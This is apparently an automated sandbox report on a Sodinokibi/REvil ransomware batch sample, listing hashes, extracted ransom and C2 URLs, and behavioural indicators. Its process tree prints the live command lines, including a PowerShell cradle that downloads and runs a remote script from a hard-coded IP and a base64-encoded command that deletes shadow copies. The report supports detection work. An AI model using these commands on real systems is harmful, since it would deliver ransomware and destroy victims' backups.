Analysis
max time kernel: 137s
max time network: 54s
platform: windows7_x64
resource: win7v200430
submitted: 08-06-2020 00:10
Static task: static1
Behavioral task: behavioral1
  Sample: 834fe3c10a5c6788c12a8dfd6b3a22bc.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: 834fe3c10a5c6788c12a8dfd6b3a22bc.bat
  Resource: win10v200430
General
Target: 834fe3c10a5c6788c12a8dfd6b3a22bc.bat
Size: 219B
MD5: 9aeae02203b8a1236ef5aa06a8df49df
SHA1: f33e529e1dd812bd81e80fcc6b08c5d019184c74
SHA256: 4792e10c28499b9868f31d6a7dd670cf12a22f14d11a7b0bb8c781289743eed7
SHA512: fdfe723f2cbf8c3f3b1a8b4211955bc60bf24f98ac81a719821e52ed5883cbdbf8b872107b5b4ae1ae5f3a6477f201f59c9452641624f4f06a61358b8013dc6e
Malware Config
Extracted: http://185.103.242.78/pastes/834fe3c10a5c6788c12a8dfd6b3a22bc
Extracted: C:\385fl2i-readme.txt
  sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D80EBFA21144DC89
  http://decryptor.cc/D80EBFA21144DC89
Signatures
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
  pid   process         token
  996   powershell.exe  SeDebugPrivilege
  996   powershell.exe  SeDebugPrivilege
  1768  powershell.exe  SeDebugPrivilege
  1612  vssvc.exe       SeBackupPrivilege
  1612  vssvc.exe       SeRestorePrivilege
  1612  vssvc.exe       SeAuditPrivilege
  996   powershell.exe  SeTakeOwnershipPrivilege
Drops file in Program Files directory (23 IoCs)
Processes: powershell.exe
  description                   ioc                                                                                    process
  File opened for modification  \??\c:\program files\ConfirmSend.pcx                                                   powershell.exe
  File opened for modification  \??\c:\program files\RequestLock.search-ms                                             powershell.exe
  File opened for modification  \??\c:\program files\SelectExpand.pptx                                                 powershell.exe
  File opened for modification  \??\c:\program files\UnlockConfirm.edrwx                                               powershell.exe
  File opened for modification  \??\c:\program files\ConvertToEnable.3g2                                               powershell.exe
  File opened for modification  \??\c:\program files\ExpandTrace.vssx                                                  powershell.exe
  File opened for modification  \??\c:\program files\MountRequest.rmi                                                  powershell.exe
  File opened for modification  \??\c:\program files\SwitchClear.eps                                                   powershell.exe
  File opened for modification  \??\c:\program files\ImportRevoke.xsl                                                  powershell.exe
  File opened for modification  \??\c:\program files\SetUse.vstx                                                       powershell.exe
  File opened for modification  \??\c:\program files\StopRevoke.xsl                                                    powershell.exe
  File opened for modification  \??\c:\program files\SuspendHide.ppsm                                                  powershell.exe
  File created                  \??\c:\program files (x86)\385fl2i-readme.txt                                          powershell.exe
  File opened for modification  \??\c:\program files\CompleteMeasure.vsw                                               powershell.exe
  File opened for modification  \??\c:\program files\ConfirmCopy.csv                                                   powershell.exe
  File opened for modification  \??\c:\program files\ExpandRequest.bmp                                                 powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\385fl2i-readme.txt          powershell.exe
  File opened for modification  \??\c:\program files\TestFind.m4v                                                      powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\385fl2i-readme.txt  powershell.exe
  File created                  \??\c:\program files\385fl2i-readme.txt                                                powershell.exe
  File opened for modification  \??\c:\program files\DismountWait.edrwx                                                powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\385fl2i-readme.txt               powershell.exe
  File opened for modification  \??\c:\program files\RenameSend.pptm                                                   powershell.exe
Enumerates connected drives (3 TTPs)
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
  pid   process
  996   powershell.exe
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
  description                        pid   process         target process
  PID 1492 wrote to memory of 996    1492  cmd.exe         powershell.exe
  PID 996 wrote to memory of 1768    996   powershell.exe  powershell.exe
  PID 996 wrote to memory of 1768    996   powershell.exe  powershell.exe
  PID 996 wrote to memory of 1768    996   powershell.exe  powershell.exe
  PID 996 wrote to memory of 1768    996   powershell.exe  powershell.exe
Suspicious behavior: EnumeratesProcesses (77 IoCs)
Processes: powershell.exe, powershell.exe
  pid   process
  996   powershell.exe
  996   powershell.exe
  996   powershell.exe
  1768  powershell.exe
  1768  powershell.exe
  996   powershell.exe
  (the remaining rows of the 77 are all 996 powershell.exe)
Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
  flow  pid   process
  3     996   powershell.exe
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  description  ioc                                                                                     process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                 vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer               vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                      vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer  vssvc.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
  description      ioc                                                                                                                                                   process
  Set value (str)  \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9160cz7m.bmp"  powershell.exe
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Processes
C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\834fe3c10a5c6788c12a8dfd6b3a22bc.bat"
  PID: 1492
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/834fe3c10a5c6788c12a8dfd6b3a22bc');Invoke-XMIUQZERWSSC;Start-Sleep -s 10000"
    PID: 996
    - Suspicious use of AdjustPrivilegeToken
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Sets desktop wallpaper using registry
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      PID: 1768
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1612
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service